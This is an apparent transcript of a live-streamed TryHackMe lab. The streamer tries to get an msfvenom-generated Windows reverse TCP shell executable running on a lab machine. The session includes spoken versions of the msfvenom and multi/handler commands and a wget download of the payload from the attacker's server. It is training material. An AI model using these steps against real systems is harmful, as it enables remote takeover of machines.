No, like, so I got the shell inside it, the shell2.exe. It's listening on there, but it's not able to execute it. Is it because of the port number? Was that could be a thing? Do you think that could be a thing, boss? Because we got a shell like 2.exe, then we have everything. What's going to happen? Da-da-da-da-da-da. Anything else binded to the port? netstat-an. No, I don't see anything. But what they recommended in the system, grep in the system. Oh, do you think? No, not here. On your attacker host, yeah. Control B down. Oh, wrong one. Control B down. Netstat. But it doesn't matter if, like, it should be just listening. What I'm thinking is, like, it's not able to run the program. What the error was is, like, it's not able to run the program. So what it could be. If you are thinking like me, if you are thinking, like, share, subscribe. I don't know why I say these things, man. Maybe I'll just restart my command prompt. I'll just increase the sensitivity a bit so you guys can hear me still. Going to put my mic a bit side. So we have dir shell2.exe. Can't run it. What if I run it as an administrator? I have to use some of my brain cells here. More than what I bargained for. Okay. We have this one. Everything else was good. Port number. Port. What is ifconfig? Mine is 10.13.86.9. Yes. Okay, at least the IP address I did was right. If you try to listen on the same port twice, the same time won't work. Second time won't work. Okay. Okay. Sounds good. But like, Bandit, my quick question is, and there's just one I think open. My question is like, it's not working on Windows itself. On Windows itself, it's not working or executing the exe. That is the issue, right? And so we need to look in the from the exe or the Windows. We need to look into that. It won't. Oh, it won't even. Let's say if there is a connection error from my side. Will it give this error even though if the connection is my side? What is this guy here? System could not execute the reverse. Or oh no, no. Should have used my interpreter. Hold up. Use multi-handler options. Exploit. No, I'm not using multi-handler. Meterpreter. Sorry, I'm not using meterpreter. Yes. Yes. Okay. So the command was. Yeah, I think that must be something. MSF Venom -P Windows x64 shell reverse TCP -F shell2.exe L host L port. Should I use like the same port they are using? Let's see if I do this 443. If I do that, and then let's say if I do control B up here, exit net stat -an grep 4444, nothing is listening, right? And then I will do to that. Okay, no messages. Okay, do you guys understand what is going on? Hopefully other people are able to. That we created an executable, but it's not executing in the Windows one. So I have this. I'll cancel this command prompt. I'll go here. Oh, first I have to move Control B down MV shell 443. So we have shell cd desktop shell 443 executable. It's a privileged port. Yeah, I need to run basically as root. Hey Panda, how you doing? Long time no see. Oh yeah, we were supposed to meet at 9. My apologies. Okay, I'll try to complete this multi-handler and then we'll do our chat. So I'm not almost done, like need a little bit time. Okay, I need to run Control B up here. MSF console sudo Kali. As that's going on, I will get the wget command shell 443 executable. Okay, ls k 443 shell 443.exe till this is going. Okay, come. Why it's not working? What's going on? Okay, it's working, is taking its time. So once I set the listener, basically use multi-handler set payload as Windows -x64 shell reverse underscore TCP set lhost 10.13.86.9 set lport 443. Okay, options. Okay, it's not going to go up a bit. That's the only bad part, I guess. But okay, basically all should be there. Now I'll do run, at least just run, not exploit -j. Started the listener. Now I'll go here, start shell 443. Okay, shell 443.exe. Why is coming as same thing again and again? Shell 443 is there. Okay, so let's think about it. The system cannot execute specified program. Executable is not running in the Windows system. It is giving what was that giving? Okay, it's not good. The system couldn't run the specified program. Okay, it's doing that. And my Venom command was, I go here, this guy, copy this, help me figure out what is wrong. Let's see. Oh, it went into the search mode or what? Okay, no, not search mode. Okay. You are using x64 system info. Okay, payload handler, shell reverse TCP. I'm using that, right? Is there a command called system info? Okay. Windows 2019 EC2 T3A small AMD 64 Okay, I'm kind of confused what's going on now. Okay. Okay, the system is not able to run the executable. This will be interesting to figure out. Is I believe Arch MSF list payloads. We use x64 for Linux, and it says here, right? Like it says here, all are identical. The above screenshot post listening must be this. The stage payload generated in previous task is run. In the previous task, we copy pasted the same command. So this is actually brain rot. Right click executable properties, unlock security. This file maybe another computer appears. Okay. Okay, so let's do this. AMD 64 is x64, right? Yes, AMD means x64, which we did. And if I go user administrator shell properties security allow special permissions blah blah blah, run compatibility. Let's see if the compatibility happens. Okay. Problem listed, okay. Test the program, let's see. Who knows, this might work. If I do run as administrator shell 443.exe, I can't even use sudo on this. That would make life easy. To make sure these settings find. Okay, that's not helpful at all. Okay. Bandit, any idea from your side what it could be? Or anyone here? Because multi-handle was originally background, you use session 1 to bring it foreground, okay. Whatever. Payload. Windows x64 shell reverse TCP. I don't really like, I'm actually running out of options in this case. Okay, so Metasploit, we have the exe payload and the options. Windows x64 shell reverse TCP. Okay, let's go back to the command, original command. Windows x64 shell reverse. Is reverse spelling correct? I'm doubting everything. REVERSETCP. Okay, I'll copy this actually. Okay, so MSF Venom -P Windows x64 shell reverse TCP -F executable -O shell.exe, that's good. lhost my port. I don't see what's the problem here. Yesterday it worked fine. Yesterday it worked beautifully rather. It's just not working in the Windows itself. Should I restart the Windows system? Do you think that might help? Or let's see Task Manager. What all is running in Task Manager? Windows, okay, end task, PowerShell, end task, expand, okay, end task. Okay, that's not good. I think I killed everything. Okay. What I can do is restart this server. Maybe that might help. Till then we can move on at least, like, and then later start this again. But I think this is like the most Room has given me issues with, like, things either not working properly or like just super slow. Payload we know is Windows x64 shell reverse TCP. Okay. Okay, let's say if it worked, right? What would happen next would be, you may notice that in the above screenshot, Metasploit is listening on port under 1024. Basically 443 is our current one, right? To do this, Metasploit must run in the sudo permission groups. That's why we had to do sudo msf venom and dash q, so we don't see the banner. When the staged payload generated in the previous task is run, Metasploit receives the connection, sending the remainder of the payload, giving us a reverse shell. Sending stage, basically command session 1 started, and we have, when we go sessions 1, if you see here, sessions 1, because it was running in the background, we go to the first session and we have our shell. Notice that because the multi-handler was originally backgrounded, we need to use sessions 1 to foreground it, bring it to in front. This worked as it was only session running. Had there been other sessions active, we would have needed to use sessions to see all active sessions, then use sessions and then the numbers, just like session 1, to select appropriate session for the foreground. This number would also be displayed in the line where the shell was opened. So command session 1 basically. What command can be used to start a listener in the background? I would love some answers. If we had just received our 10th reverse shell in the current Metasploit session, what would be the command to be used in the foreground? If you want to learn, this is the time. This is the time. I'll try to connect to the windows. I would love to hear some answers. Till then. Okay. Till then, I'm just going to use my command B here, clipboard 3. Okay, windows should appear now. Okay. Let's see if we can get what we wanted. Let's first load PowerShell to do the wget. Come on, load. Okay. PowerShell. I have also a meeting in like 5 minutes starting, so this will probably be the last task. Tomorrow I don't have anything, so we can go for super long. And tomorrow is Friday, so TGIF for in America. So we have like whole night. We'll cover whatever you guys like, including how much you like. So I will say wget my IP 10.13.86.9, port number 8080, because I have my Python HTTP server running, which can get any files we want. Dash out file. Then I will say shell 443.exe. Let's see it's there. And then start. Oh, you can't see the start actually because it's here. Start shell. This command cannot be run. File or directory is corrupted or unreadable. Okay, so how about if I move this mv shell.exe to desktop? It's not here. Desktop. Start. Maybe because of the hierarchy. Expression, blah blah blah. Press command. Okay. Because I'm thinking maybe because of the permissions issues at the folder level, it might be giving issues from that side. Oh, also chmod 400 ls-al mode Windows make a file executable. Okay, will this work? No. It won't work, my media. Okay, shell. How to create a window file. Get at chmod. I don't understand. Okay, but let's try. Get add chmod equals plus x shell 443. Get is not a recognized command. I have how to make a file executable in Windows like we do in Linux with chmod 400. Let's see. File will be based on the access control rather than simple mode bits. To make file executable, you usually must need to give it executable extension. Windows will then recognize and run it. Okay, I think this was the one. To restrict access to the file similar to the chmod. Permission. Changes the file readable only by your user, similar to what? Then what will be the this probably is the command to make it executable. And I can share my face actually. Hopefully followers don't drop. Grant username RX. Everybody RX. Okay, they're beautiful. Let's try this. If I go successfully processed. Now let's see. I'll make it quickly a bit bigger so you guys can see. Medium font 28. This is good. CD desktop. Now requires start. Holy, if I just click this file, the file is corrupted. No, bro, no. It says the file is corrupted, which I don't get it. I think I have to like look back. I have to do some debugging by myself later on. I thought it might be executable, you know, like we do chmod 400 and stuff. Sessions 10 for. Oh, okay. I see what he's saying, bro. I think, yeah, you're right. You're right. Sessions 10 if you are going to session number 10. Nice. Good job, buddy. And this one you should be able to do. We talked about this. I would love to hear the answer from this as well. I know you know this. Just say it. MSF Venom. Windows. Okay, so MSF Venom not working. MSF Venom -p interpreter reverse TCP blah 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 -f this current behavior. So instead of exploit dash j, yep, Bandit, you're right. Exploit dash j, that is the correct answer. Let's go, bro. Thank you so much. I like that. Okay. Why is saying start machine? Did I drop the machine? Oh, okay, it's probably ended the session because it's trying to run or something. That's fine. Okay, let's do this. So I'll go. I'm at home. I can't say I go home. So I'll work on this. Look through these, like what is going on. I try with three different things and see what is going on. Then tomorrow we'll cover, because tomorrow is my basically Saturday will be, not tomorrow but day after tomorrow will be Saturday. So I will have all the time in the world. We'll cover web shells. And we'll cover web shells, but also we'll do something called Pickle Rick, a CTF, which I've done before, but I love doing it. It was my first CTF on TryHackMe. So we'll do that, and then we'll look into the next steps, and so a lot of things, and we'll do practice and examples. So we'll do a bunch of these commands. So let's do that. Hopefully that's fine with you guys, right? Tomorrow I'll come around the same time, 7:30 or 8 p.m. my time, and then we'll do a 3-4 hour long session. I'll have my food ready before. I'll eat my food before my dinner. But yeah, thank you everyone for joining. I see so many people. You guys don't know how much, like, it's such a big thing, right? So many people, like these likes, so many messages. Thanks Want, thanks Heartfield, thanks Bandit, right? Thanks Panda. Every time you guys message means a lot to me. I don't know for other people it matters or not, but for me it matters a lot. So big thanks to everyone, right? And yeah, that's I don't know, I get emotional very fast with these cases. So thank you for making my dream come true. That's I can say. You guys means a lot to me. So thank you. Have a great day. If you're in India or in the east side, TGIF, thank God it's Friday, right? Happy Friday. For others, happy Thursday night, right? Have a good night, get some sleep, and we'll do a 3-4 hour long session. So thank you. Feel free to, by the way, feel free to join the Discord and ask any questions you have. We got amazing people like Bandit and Stimulus and Want, right? Oh, I should do this. Discord. This is the Discord, so join, right? Hang out. And over the weekend, special stream coming for Junior Penetration Tester certificate, because there is a poll I have done. I'll just share my screen quickly. There's a poll going on in the server, what you guys would like me to do in the just chatting one, right? So Junior Penetration Tester, so we'll go over those topics, try to see what all is needed, and might even start working towards this certificate, something good to have in the belt. One of the feathers in your hat. So we'll look into those. So till then, thank you so much. Have a great day. And like usual, I'll like to say bye. Bye everyone. Love you. Thank you.